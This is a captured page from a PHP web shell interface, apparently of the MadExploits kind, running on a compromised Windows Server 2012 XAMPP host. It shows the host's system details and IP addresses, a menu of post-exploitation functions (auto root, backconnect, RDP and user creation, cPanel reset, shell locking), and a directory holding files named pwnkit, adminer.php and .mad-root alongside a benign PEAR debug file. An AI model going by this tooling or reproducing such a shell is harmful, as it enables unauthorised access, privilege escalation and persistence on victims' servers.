Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
PHP /
Debug /
[ HOME SHELL ]
Name
Size
Permission
Action
Renderer
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Renderer.php
1.28
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Renderer.php
<?php require_once 'PHP/Debug/Renderer/Common.php'; /** * A loader class for the renderers. * * @package PHP_Debug * @category PHP * @author Loic Vernet <qrf_coil at yahoo dot fr> * @since V2.0.0 - 10 Apr 2006 * * @package PHP_Debug * @filesource * @version CVS: $Id: Renderer.php,v 1.1 2008/05/02 14:26:37 c0il Exp $ */ class PHP_Debug_Renderer { /** * Attempt to return a concrete Debug_Renderer instance. * * @param string $mode Name of the renderer. * @param array $options Parameters for the rendering. * @access public */ public static function factory($debugObject, $options) { $className = 'PHP_Debug_Renderer_'. $options['render_type']. '_'. $options['render_mode']; $classPath = 'PHP/Debug/Renderer/'. $options['render_type']. '/'. $options['render_mode']. '.php'; include_once $classPath; if (class_exists($className)) { $obj = new $className($debugObject, $options); } else { include_once 'PEAR.php'; PEAR::raiseError('PHP_Debug: renderer >' . $options['DEBUG_render_mode'] . '< not found', true); return NULL; } return $obj; } }
Close